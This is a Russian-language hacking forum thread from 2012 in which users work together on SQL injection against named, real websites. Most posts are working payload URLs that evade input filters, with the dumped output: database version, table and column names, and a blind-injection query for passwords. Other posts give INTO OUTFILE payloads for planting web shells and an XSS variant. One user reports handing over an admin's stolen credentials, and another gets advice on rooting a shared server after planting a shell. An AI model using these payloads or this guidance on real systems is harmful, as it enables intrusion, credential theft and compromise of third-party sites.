ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.02.2012, 19:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от pirat0
pirat0 said:
http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)
вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??
У тебя запятые фильтруется. Вместо пробела юзай /**/, а комментарии /*. Пока такой вид:
Код:
Code:
http://www.bluegrassmidwest.com/details.php?id=6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/2)y/**/join(select/**/3)z/*
Код:
Code:
The used SELECT statements have a different number of columns
Сейчас докрутим
UPD.
Код:
Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/version())y/**/join(select/**/user())z/**/join(select/**/database())a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*
Код:
Code:
5.0.22:web115u1@localhost:web115db1
Удачи
|
|
|
|
03.02.2012, 20:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Ereee
Ereee said:
Удачи
добавил
table_name+from+information_schema.tables
Сообщение от None
http://www.bluegrassmidwest.com/details.php?id=-6%27/**/union/**/select/**/*/**/from/**/%28select/**/1%29x/**/join/**/%28select/**/table_name+from+information_schema.tables%29y/**/join%28select/**/user%28%29%29z/**/join%28select/**/version%28%29%29a/**/join%28select/**/5%29b/**/join%28select/**/6%29c/**/join%28select/**/7%29d/**/join%28select/**/8%29e/**/join%28select/**/9%29f/**/join%28select/**/10%29g/**/join%28select/**/11%29h/*
и снова таже ошибка
|
|
|
|
03.02.2012, 22:49
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от OxoTnik
OxoTnik said:
Не пашет заливка шела через sql иньекцию
Делаю запрос
file_priv = Y
в чём дело не могу понять
во первых желатильней код шела в значение хекс преоброзовать, во вторых убедись что кавычки не фильтруются и не слешируются...
|
|
|
03.02.2012, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
и снова таже ошибка
Код:
Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/version())y/**/join(select/**/table_name/**/from/**/information_schema.tables)z/**/join(select/**/database())a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*
Код:
Code:
CHARACTER_SETS
Но мы не сможем юзать /**/limit/**/0 ,1. Ведь там запятая, которая фильтруется.
Поэтому попробуем group_concat:
Код:
Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*
Видим members.
Еще один ньюанс. Оказывается, что фильтруется и "=". Т.e. where/**/table_name ='members' юзать невозможно. Но зато есть LIKE:
Код:
Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'members')y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*
Код:
Code:
memberID,lname,fname,email
и т.д.
P.S. Можно еще в XSS превратить:
Код:
Code:
http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/%3Cscript%3Ealert('Privet!')%3C/script%3E/**/from/**/members)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/*
2OxoTnik,
Код:
Code:
+union+select+1,2,'',4,5,6,7,8+into+outfile+'/var/www/shell.php'--
Папка доступна на запись? При выполнении error не выскакивает? Если да, то ищи другие папки. Проверь MQ.
|
|
|
|
03.02.2012, 23:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
45485
Репутация:
1
|
|
Сообщение от OxoTnik
OxoTnik said:
Не пашет заливка шела через sql иньекцию
Делаю запрос
file_priv = Y
в чём дело не могу понять
Код:
Code:
select '' from table_name into outfile '/var/www/shell.php';
или попробуй так:
Код:
Code:
select '' from mysql.user into outfile '/var/www/shell.php'
|
|
|
|
04.02.2012, 00:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
а вот такой вопрос, короче тут слепая скуля,
наугад в пару запросов нашол таблицу users и колонку passwd
Сообщение от None
http://www.pushkino-online.ru/auto_ads.php?aid=7+and+ascii%28substring%28%28sele ct%20passwd%20from%20users%20limit%200,1%29,1,1%29 %29=100
осталось добыть пароль, и тут возникла проблема,
через пхп скрипт немогу перебрать так как при откритии урала в ответе от сайта только ответ о том что неустановлен какойто плагин, хавидж не может ничего сделать, какие могут быть предложеня? |
|
|
|
04.02.2012, 12:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Сообщение от qaz
qaz said:
хавидж не может ничего сделать, какие могут быть предложеня?
Если хавидж не берет, значит раскрутить это нельзя!!! XDDD
Какие тут могут быть предложения... Крути ручками или ищи еще какие-то программы (sqlmap, Toolza, даже не знаю какие еще существуют), иногда бывает проще написать скрипт для дампа самому.
З.Ы: Отправил логин-пароль админа в личку.
|
|
|
|
04.02.2012, 12:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
Такая проблема, залил шел на сайт, зашёл на шел оказался в /home/gtrxuoxn/public_html/images/, далее перешёл в раздел /home/, а там около 3х тыщ сайтов и не на одном нельзя править править файлы даже не везде можно загрузить файл, что тут можно сделать??
|
|
|
|
04.02.2012, 13:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Попытайся получить root-права на этой машине (тебе Сюда)
Выложи туда конфигурацию сервера согласно примеру из 1ого поста и возможно тебе помогут :3 |
|
|
|
04.02.2012, 13:25
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
muljtik, найди на сайтах папки с правами на запись и выполнение, залей туда шеллы.
Если крупные сайты, можно поискать баги в скриптах.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
